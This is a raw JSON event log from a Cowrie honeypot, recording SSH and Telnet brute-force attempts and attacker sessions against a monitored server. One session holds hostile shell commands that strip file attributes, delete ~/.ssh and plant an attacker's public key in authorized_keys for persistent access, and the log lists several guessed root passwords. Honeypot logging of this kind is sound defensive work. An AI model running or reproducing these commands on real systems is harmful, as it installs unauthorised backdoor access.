{"eventid":"cowrie.session.closed","duration":"301.3","message":"Connection lost after 301.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:08:26.939736Z","src_ip":"212.227.235.229","session":"7c0652856716"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32978,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1fbbd002ed2","protocol":"ssh","message":"New connection: 212.227.235.229:32978 (1.2.3.4:22) [session: a1fbbd002ed2]","sensor":"my-vps","timestamp":"2025-08-28T11:08:43.015100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:08:43.017917Z","src_ip":"212.227.235.229","session":"a1fbbd002ed2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:08:43.258226Z","src_ip":"212.227.235.229","session":"a1fbbd002ed2"}
{"eventid":"cowrie.login.success","username":"root","password":"12344321q","message":"login attempt [root/12344321q] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:08:45.379598Z","src_ip":"212.227.235.229","session":"a1fbbd002ed2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55894,"dst_ip":"1.2.3.4","dst_port":22,"session":"966d806fb5af","protocol":"ssh","message":"New connection: 212.227.235.229:55894 (1.2.3.4:22) [session: 966d806fb5af]","sensor":"my-vps","timestamp":"2025-08-28T11:08:58.692704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:08:58.693907Z","src_ip":"212.227.235.229","session":"966d806fb5af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:08:58.954576Z","src_ip":"212.227.235.229","session":"966d806fb5af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57139,"dst_ip":"1.2.3.4","dst_port":23,"session":"a824bd333818","protocol":"telnet","message":"New connection: 212.227.125.160:57139 (1.2.3.4:23) [session: a824bd333818]","sensor":"my-vps","timestamp":"2025-08-28T11:09:12.406697Z"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":51210,"dst_ip":"1.2.3.4","dst_port":22,"session":"51125353407f","protocol":"ssh","message":"New connection: 27.112.79.123:51210 (1.2.3.4:22) [session: 51125353407f]","sensor":"my-vps","timestamp":"2025-08-28T11:09:23.587038Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:09:23.588001Z","src_ip":"27.112.79.123","session":"51125353407f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:09:23.865776Z","src_ip":"27.112.79.123","session":"51125353407f"}
{"eventid":"cowrie.login.success","username":"root","password":"258456","message":"login attempt [root/258456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:09:24.993629Z","src_ip":"27.112.79.123","session":"51125353407f"}
{"eventid":"cowrie.session.closed","duration":12.631743907928467,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:09:25.038339Z","src_ip":"212.227.125.160","session":"a824bd333818"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:09:25.553224Z","src_ip":"27.112.79.123","session":"51125353407f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:09:25.554069Z","src_ip":"27.112.79.123","session":"51125353407f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:09:25.555292Z","src_ip":"27.112.79.123","session":"51125353407f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:09:25.826040Z","src_ip":"27.112.79.123","session":"51125353407f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:09:27.050798Z","src_ip":"27.112.79.123","session":"51125353407f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:09:27.051577Z","src_ip":"27.112.79.123","session":"51125353407f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:09:27.322322Z","src_ip":"27.112.79.123","session":"51125353407f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:09:27.323345Z","src_ip":"27.112.79.123","session":"51125353407f"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":39008,"dst_ip":"1.2.3.4","dst_port":22,"session":"f17aed52bd39","protocol":"ssh","message":"New connection: 27.112.79.123:39008 (1.2.3.4:22) [session: f17aed52bd39]","sensor":"my-vps","timestamp":"2025-08-28T11:09:27.591971Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:09:27.592713Z","src_ip":"27.112.79.123","session":"f17aed52bd39"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:09:27.862213Z","src_ip":"27.112.79.123","session":"f17aed52bd39"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:09:28.981691Z","src_ip":"27.112.79.123","session":"f17aed52bd39"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:09:30.260927Z","src_ip":"27.112.79.123","session":"f17aed52bd39"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":39010,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2a70606aba2","protocol":"ssh","message":"New connection: 27.112.79.123:39010 (1.2.3.4:22) [session: c2a70606aba2]","sensor":"my-vps","timestamp":"2025-08-28T11:09:30.522388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:09:30.523145Z","src_ip":"27.112.79.123","session":"c2a70606aba2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:09:30.783640Z","src_ip":"27.112.79.123","session":"c2a70606aba2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:09:31.868650Z","src_ip":"27.112.79.123","session":"c2a70606aba2"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:09:32.131439Z","src_ip":"27.112.79.123","session":"51125353407f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:09:32.132650Z","src_ip":"27.112.79.123","session":"c2a70606aba2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58404,"dst_ip":"1.2.3.4","dst_port":22,"session":"040643e2c6ad","protocol":"ssh","message":"New connection: 212.227.125.160:58404 (1.2.3.4:22) [session: 040643e2c6ad]","sensor":"my-vps","timestamp":"2025-08-28T11:09:33.401159Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:09:33.571241Z","src_ip":"212.227.125.160","session":"040643e2c6ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44544,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cc472455132","protocol":"ssh","message":"New connection: 212.227.235.229:44544 (1.2.3.4:22) [session: 0cc472455132]","sensor":"my-vps","timestamp":"2025-08-28T11:10:32.759362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:10:32.760611Z","src_ip":"212.227.235.229","session":"0cc472455132"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:10:32.997820Z","src_ip":"212.227.235.229","session":"0cc472455132"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T11:10:34.265325Z","src_ip":"212.227.235.229","session":"0cc472455132"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:10:35.505898Z","src_ip":"212.227.235.229","session":"0cc472455132"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":47474,"dst_ip":"1.2.3.4","dst_port":22,"session":"353c76ecf610","protocol":"ssh","message":"New connection: 27.112.79.123:47474 (1.2.3.4:22) [session: 353c76ecf610]","sensor":"my-vps","timestamp":"2025-08-28T11:10:39.506752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:10:39.507876Z","src_ip":"27.112.79.123","session":"353c76ecf610"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:10:39.783189Z","src_ip":"27.112.79.123","session":"353c76ecf610"}
{"eventid":"cowrie.login.failed","username":"fred","password":"fred","message":"login attempt [fred/fred] failed","sensor":"my-vps","timestamp":"2025-08-28T11:10:40.926412Z","src_ip":"27.112.79.123","session":"353c76ecf610"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:10:42.203066Z","src_ip":"27.112.79.123","session":"353c76ecf610"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55756,"dst_ip":"1.2.3.4","dst_port":22,"session":"d95b7436cdd3","protocol":"ssh","message":"New connection: 212.227.235.229:55756 (1.2.3.4:22) [session: d95b7436cdd3]","sensor":"my-vps","timestamp":"2025-08-28T11:10:42.702361Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:10:42.963200Z","src_ip":"212.227.235.229","session":"d95b7436cdd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55760,"dst_ip":"1.2.3.4","dst_port":22,"session":"0059c0f96bdc","protocol":"ssh","message":"New connection: 212.227.235.229:55760 (1.2.3.4:22) [session: 0059c0f96bdc]","sensor":"my-vps","timestamp":"2025-08-28T11:10:43.203723Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:10:43.204773Z","src_ip":"212.227.235.229","session":"0059c0f96bdc"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T11:10:44.211272Z","src_ip":"212.227.235.229","session":"0059c0f96bdc"}
{"eventid":"cowrie.login.success","username":"root","password":"------fuck------","message":"login attempt [root/------fuck------] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:10:45.776753Z","src_ip":"212.227.235.229","session":"0059c0f96bdc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:10:47.440217Z","src_ip":"212.227.235.229","session":"0059c0f96bdc"}
{"eventid":"cowrie.command.input","input":"uname -s -m","message":"CMD: uname -s -m","sensor":"my-vps","timestamp":"2025-08-28T11:10:47.440899Z","src_ip":"212.227.235.229","session":"0059c0f96bdc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","size":13,"shasum":"6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:10:47.692728Z","src_ip":"212.227.235.229","session":"0059c0f96bdc"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:10:47.693834Z","src_ip":"212.227.235.229","session":"0059c0f96bdc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46602,"dst_ip":"1.2.3.4","dst_port":23,"session":"de7c492c77ef","protocol":"telnet","message":"New connection: 212.227.125.160:46602 (1.2.3.4:23) [session: de7c492c77ef]","sensor":"my-vps","timestamp":"2025-08-28T11:10:54.508518Z"}
